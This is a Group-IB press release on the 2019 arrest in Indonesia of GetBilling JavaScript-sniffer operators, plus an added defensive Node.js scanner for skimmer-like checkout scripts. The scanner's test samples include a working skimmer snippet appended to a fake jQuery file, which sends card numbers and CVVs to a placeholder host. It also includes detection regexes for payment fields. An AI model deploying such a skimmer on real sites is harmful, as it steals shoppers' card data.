Operation Night Fury: with the participation of Group-IB, cybercriminals who infected hundreds of online stores were detained in Indonesia



The Indonesian cyber police, together with INTERPOL and Group-IB, have announced the arrest of members of a criminal group that infected hundreds of online stores in Australia, Brazil, the United Kingdom, Germany, Indonesia, the United States and other countries with JavaScript sniffers, a widespread type of malicious code. Russian and Ukrainian users are among the victims. The criminals stole customers' bank card details and used them to buy gadgets and luxury goods. The takedown of this group is the first successful operation against JS-sniffer operators in the Asia-Pacific region (APAC).

The joint operation, codenamed "Night Fury", by the Indonesian cyber police, INTERPOL's ASEAN Cyber Capability Desk (ASEAN Desk) and Group-IB's APAC cyber investigations team was conducted in December 2019. Three Indonesian residents aged 23 to 35 were arrested; all of them are charged with the theft of electronic data using GetBilling sniffers. The operation is still ongoing in five other locations in the Asia-Pacific region.

The GetBilling sniffer family was first described in Group-IB's "Crime Without Punishment" report in April 2019. JavaScript sniffers are a widespread type of malicious code used in attacks on online stores to steal customers' personal and payment data: bank card numbers, names, addresses, logins, phone numbers and credentials for payment systems. Group-IB Threat Intelligence specialists have been tracking the GetBilling family since 2018. An analysis of the infrastructure controlled by the GetBilling operators arrested in Indonesia showed that they had infected almost 200 websites in Indonesia, Australia, Europe, the United States, South America and several other countries.

Indonesian footprint


In 2019, Group-IB's investigation team established that part of the GetBilling infrastructure was hosted in Indonesia, and INTERPOL's ASEAN Desk promptly passed this information to the Indonesian cyber police. The GetBilling operators tried to hide their location: they always connected through a VPN to the server used to collect stolen data and control the sniffer, and they paid for hosting and new domains only with stolen cards. Nevertheless, Group-IB experts, together with local police officers, gathered evidence that the group was operating from Indonesia and then traced the suspects themselves.



"In today's digital world, cybercriminals are rapidly adopting cutting-edge technologies to hide their illegal activities and steal large amounts of personal data for financial gain," said Craig Jones, Director of Cybercrime Investigations at INTERPOL. "Ensuring that law enforcement agencies have access to the information they need to fight cybercrime requires a strong and fruitful partnership between police and information security experts."



Example of a malicious GetBilling script



Example of a record of stolen payment and personal data stored on GetBilling servers.

"This case clearly demonstrates the international scope of cybercrime: JS sniffer operators lived in Indonesia, but attacked e-commerce resources around the world, which made it more difficult to collect evidence, search for victims and prosecute," says Vesta Matveeva, Head of Information Security Incident Investigations at Group-IB APAC. "However, international cooperation and data sharing can help effectively counteract current cyber threats. Thanks to the rapid actions of the Indonesian cyber police and INTERPOL, Night Fury became the first successful international operation against JavaScript sniffer operators in the APAC region. This is an excellent example of a coordinated cross-border fight against cybercrime, and we are proud that the result of our Threat Intelligence, understanding of criminal schemes and their investigation, as well as forensic data analysis by Group-IB specialists helped to identify suspects. We hope that this case will set a precedent for law enforcement agencies in other jurisdictions as well."

During the search, the police seized laptops, mobile phones of various manufacturers, processors, identification cards and bank cards from the detainees. According to the investigation, the stolen payment data was used by the suspects to buy gadgets and luxury goods, which they then resold on Indonesian websites below market value. The suspects have already been charged with stealing electronic data — a crime punishable by up to ten years in prison under Indonesia's criminal code. The investigation continues.



"The coordination of efforts between the Indonesian cyber police, INTERPOL and Group-IB allowed attributing crimes, identifying criminals who used sniffers, and arresting them," said Idam Wasiyadin, Superintendent of the Indonesian Police. "But more importantly, it has helped protect innocent people and raise public awareness of cybercrime and its consequences."

Sniffers raise their heads


According to Group-IB's annual Hi-Tech Crime Trends report covering H2 2018 to H1 2019, the total number of compromised bank cards uploaded to underground forums worldwide grew from 27.1 million to 43.8 million. Dumps (copies of magnetic-stripe data) still make up the bulk of the carding market, and their number grew by 46%. Sales of text data (card number, CVV and expiry date) are also rising, up 19%. The largest bank card leaks are linked to compromises of US retailers; by number of compromised cards the United States leads by a wide margin, accounting for 93%.

JS sniffers are one of the reasons for the growth in stolen text data. In spring 2019, the Group-IB report "Crime Without Punishment", written by Group-IB analyst Viktor Okorokov, listed 38 JS-sniffer families. Since then the number of families detected by the company has almost doubled and keeps growing. Victims have included the websites of British Airways and the international sporting-goods giant FILA, and most recently, in December 2019, JS sniffers reached the APAC region, infecting the website of the Singapore fashion brand Love, Bonito.

To avoid financial losses from JS sniffers, Group-IB experts recommend that online shoppers use a separate bank card, or even a separate bank account, for online payments and set spending limits on it. Online store owners, in turn, should keep their software up to date and regularly commission security audits and assessments of their web resources.
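The sniffer pattern the article describes (a script injected into a store's pages that reads the payment form and reports the data to infrastructure the criminals control) and the site audit recommended above can be illustrated with a heuristic triage of the scripts loaded by a checkout page. The following is an added example, not code from Group-IB, from the article or from the GetBilling family: the regular expressions, the store host `shop.example`, the "foreign host" rule and the three sample scripts are all assumptions made for this illustration. It runs under Node.js.

```javascript
// Added example (not code from Group-IB or the original article): a heuristic
// static triage of checkout-page scripts for JS-sniffer-like behaviour.
// Assumptions (mine, not the page's): the store's own host is known, and a
// script that (1) references payment-field identifiers, (2) hooks form input
// or submission or uses a network/beacon API, and (3) names a host outside the
// store's site (or hides its endpoint behind obfuscation) deserves manual
// review. The three sample scripts below are constructed for this example.

const PAYMENT_FIELD_RE =
  /\b(card[_-]?number|cardnumber|cc[_-]?num(ber)?|cvv2?|cvc|exp(iry|iration)[_-]?(date|month|year)?|card[_-]?holder)\b/i;
const FORM_HOOK_RE =
  /\b(addEventListener\s*\(\s*['"](submit|click|change|input|keyup)['"]|\.onsubmit\b|document\.forms\b|querySelectorAll?\s*\(\s*['"]input)/;
const NETWORK_API_RE =
  /\b(XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon|new\s+Image\s*\(|\.src\s*=)/;
const OBFUSCATION_RE = /\b(atob|unescape|String\.fromCharCode)\s*\(/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Hosts that appear literally in the script. An obfuscated endpoint will not
// show up here, which is why OBFUSCATION_RE is tracked as a separate indicator.
function extractHosts(code) {
  const hosts = new Set();
  for (const m of code.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function isSameSite(host, storeHost) {
  return host === storeHost || host.endsWith('.' + storeHost);
}

function scanScript(name, code, storeHost) {
  const foreignHosts = extractHosts(code).filter(h => !isSameSite(h, storeHost));
  const indicators = {
    paymentFields: PAYMENT_FIELD_RE.test(code),
    formHook: FORM_HOOK_RE.test(code),
    networkApi: NETWORK_API_RE.test(code),
    obfuscation: OBFUSCATION_RE.test(code),
    foreignHosts,
  };
  // Core sniffer pattern: read the payment fields, then talk to somewhere that
  // is not the store. Obfuscation alone is a weak signal (minified libraries
  // trigger it routinely), so it only counts together with the other two.
  const suspicious =
    indicators.paymentFields &&
    (indicators.formHook || indicators.networkApi) &&
    (foreignHosts.length > 0 || indicators.obfuscation);
  return { name, suspicious, indicators };
}

function scanPage(scripts, storeHost) {
  return scripts.map(s => scanScript(s.name, s.code, storeHost));
}

// --- constructed samples (not real scripts) --------------------------------
const STORE_HOST = 'shop.example';

const SAMPLE_SCRIPTS = [
  {
    name: 'checkout.js (store-owned validation)',
    code: `
      document.forms.payment.addEventListener('submit', function (e) {
        var pan = document.querySelector('input[name="card_number"]').value;
        if (!luhnOk(pan)) { e.preventDefault(); return; }
        fetch('https://shop.example/api/checkout', { method: 'POST', body: new FormData(e.target) });
      });`,
  },
  {
    name: 'jquery.min.js (tampered, skimmer appended)',
    code: `
      (function(){var g='https://cdn-stats.example.net/gate.php?d=';
      document.addEventListener('submit',function(){var o={};
      document.querySelectorAll('input').forEach(function(i){o[i.name]=i.value;});
      if(o.card_number&&o.cvv){(new Image()).src=g+btoa(JSON.stringify(o));}});})();`,
  },
  {
    name: 'analytics.js (third party, touches no payment fields)',
    code: `
      navigator.sendBeacon('https://analytics.example.org/collect',
        JSON.stringify({ page: location.pathname, ref: document.referrer }));`,
  },
];

const results = scanPage(SAMPLE_SCRIPTS, STORE_HOST);
for (const r of results) {
  const hosts = r.indicators.foreignHosts;
  console.log(`${r.suspicious ? 'SUSPICIOUS' : 'ok        '} ${r.name}` +
    (hosts.length ? `  foreign hosts: ${hosts.join(', ')}` : ''));
}
```

The rule deliberately errs towards manual review: a legitimate third-party payment widget that reads card fields and posts to its own provider will also be flagged, which is the right outcome for an audit, because such a script is exactly what a sniffer impersonates. Static matching is only a first pass; the hosts a checkout page actually contacts at runtime should be compared against an allow-list as well.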

Group-IB knows everything about cybercrime, but shares only the most interesting parts.

An action-packed Telegram channel (https://t.me/Group_IB) about information security, hackers and cyberattacks, hacktivists and Internet pirates: step-by-step investigations of high-profile cybercrimes, practical cases using Group-IB technologies and, of course, advice on how not to become a victim online.

Group-IB photo feed on Instagram www.instagram.com/group_ib
Short news on Twitter twitter.com/GroupIB

Group-IB is one of the leading developers of solutions for detecting and preventing cyberattacks, detecting fraud and protecting intellectual property online, headquartered in Singapore.